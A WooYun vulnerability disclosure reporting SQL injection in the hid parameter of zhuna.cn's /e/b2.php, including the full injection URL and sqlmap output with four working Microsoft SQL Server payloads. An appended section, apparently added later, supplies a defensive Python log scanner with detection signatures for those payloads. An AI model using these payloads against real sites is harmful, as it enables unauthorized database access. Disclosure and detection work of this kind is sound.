
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0100054

Title: SQL injection vulnerability on the main site of 住哪网

Vendor: 住哪网

Author: 疏懒

Submitted: 2015-03-09 12:03

Fixed: 2015-04-23 12:04

Published: 2015-04-23 12:04

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure timeline:

2015-03-09: Details sent to the vendor, awaiting vendor action
2015-03-09: Vendor confirmed; details disclosed to the vendor only
2015-03-19: Details disclosed to core white hats and domain experts
2015-03-29: Details disclosed to regular white hats
2015-04-08: Details disclosed to intern white hats
2015-04-23: Details disclosed to the public

Summary:

The main site of 住哪网 has a SQL injection vulnerability.

Details:

Injection point:

http://www.zhuna.cn/e/b2.php?hid=88952634&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10#47436f33-d5e2-4310-8d4a-9eec17a9e962


Testing shows that the hid parameter is injectable.

Proof of vulnerability:

sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Place: GET
Parameter: hid
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
Payload: hid=(SELECT (CASE WHEN (4885=4885) THEN 88952634 ELSE 4885*(SELECT 4885 FROM master..sysdatabases) END))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10

Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: hid=-9548 OR 3123=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT (CASE WHEN (3123=3123) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58)))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: hid=-3737 OR 2638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: hid=(SELECT CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT (CASE WHEN (4578=4578) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
---
[19:36:04] [INFO] testing Microsoft SQL Server
[19:36:04] [INFO] confirming Microsoft SQL Server
[19:36:05] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[19:36:05] [INFO] fetching database names


[Screenshot: QQ截图20150307193950.png]


Fix recommendation:

You are the professionals.
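The report leaves remediation to the vendor. As an added example, not part of the original report and not 住哪网's own code, the Python below shows two defensive checks that follow directly from it: treating hid, rid and pid as integer-only parameters (an assumption drawn from the values in the original request URL, not from the b2.php source, which the report does not show), and flagging the Microsoft SQL Server payload shapes that appear in the sqlmap output above (CASE WHEN, CONVERT(INT, ...), master..sysdatabases, the sysusers cross join, CHAR() concatenation) when reviewing web server access logs. The log format, client address, timestamps and request lines are constructed for the example; the request lines mirror the shapes of the report's payloads but are not copied from a real log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Payload shapes taken from the sqlmap output in this report (Microsoft SQL Server).
# These are signatures for log review and WAF tuning, not an exhaustive catalogue.
SIGNATURES = {
    "mssql-boolean-case": re.compile(r"\bCASE\s+WHEN\b.*\bTHEN\b", re.I | re.S),
    "mssql-error-convert": re.compile(r"\bCONVERT\s*\(\s*INT\b", re.I),
    "mssql-heavy-query": re.compile(r"\bFROM\s+sysusers\b", re.I),
    "mssql-system-table": re.compile(r"\bmaster\.\.sysdatabases\b", re.I),
    "char-concat": re.compile(r"(?:\bCHAR\s*\(\s*\d+\s*\)\s*\+?\s*){3,}", re.I),
}

# Parameters the application only ever needs as integers. Assumption: based on the
# values in the original request (hid=88952634&rid=...&pid=...), not on b2.php source.
INT_PARAMS = {"hid", "rid", "pid"}

# Common Log Format request line; the request target carries the query string.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)


def analyze_request(target):
    """Return (param, finding) pairs for one request target (path plus query string).

    parse_qs percent-decodes the values, so the signatures run against what the
    application itself would have received.
    """
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            # Type check first: an integer-only parameter carrying anything else is
            # the cheapest and most reliable signal, independent of any payload list.
            if name in INT_PARAMS and not re.fullmatch(r"-?\d+", value):
                findings.append((name, "non-integer-value"))
            for sig_name, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.append((name, sig_name))
    return findings


def scan_log(lines):
    """Return one alert dict per log line whose parameters trigger a finding."""
    alerts = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # not a request line in the expected format; skip rather than guess
        findings = analyze_request(match.group("target"))
        if findings:
            alerts.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "status": match.group("status"),
                "target": match.group("target"),
                "findings": findings,
            })
    return alerts


# Constructed sample log: one legitimate request shaped like the report's URL, then
# three requests carrying the shapes of the report's sqlmap payloads (URL-encoded as
# a client would send them; 203.0.113.5 is a documentation address).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Mar/2015:19:35:58 +0800] "GET /e/b2.php?hid=88952634&rid=88952634'
    '&pid=88952634&tm1=2015-3-8&tm2=2015-3-10 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [07/Mar/2015:19:36:01 +0800] "GET /e/b2.php?hid=(SELECT%20(CASE%20WHEN'
    '%20(4885%3D4885)%20THEN%2088952634%20ELSE%204885*(SELECT%204885%20FROM%20master..'
    'sysdatabases)%20END))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [07/Mar/2015:19:36:02 +0800] "GET /e/b2.php?hid=-9548%20OR%203123%3D'
    'CONVERT(INT%2C(CHAR(58)%2BCHAR(120)%2BCHAR(122)%2BCHAR(120)%2BCHAR(58)))'
    '&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10 HTTP/1.1" 500 312',
    '203.0.113.5 - - [07/Mar/2015:19:36:04 +0800] "GET /e/b2.php?hid=-3737%20OR%202638%3D'
    '(SELECT%20COUNT(*)%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2)'
    '&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["ip"], "status", alert["status"])
        for param, finding in alert["findings"]:
            print("    ", param, "->", finding)
```

The non-integer check is the part worth carrying into the application itself: casting hid to an integer (or binding it as an integer parameter in a prepared statement) removes the injection regardless of which database or payload is involved, while the signature list only helps with after-the-fact review of logs such as the one the sqlmap session above would have left behind. Note that the 500 status on the error-based request is itself a useful secondary signal when correlated with the parameter findings.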

Copyright notice: please credit the source when reposting: 疏懒@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-03-09 13:38

Vendor reply:

Thank you very much for the information you reported; the fix has been handed to our engineering team.

Latest status:

None yet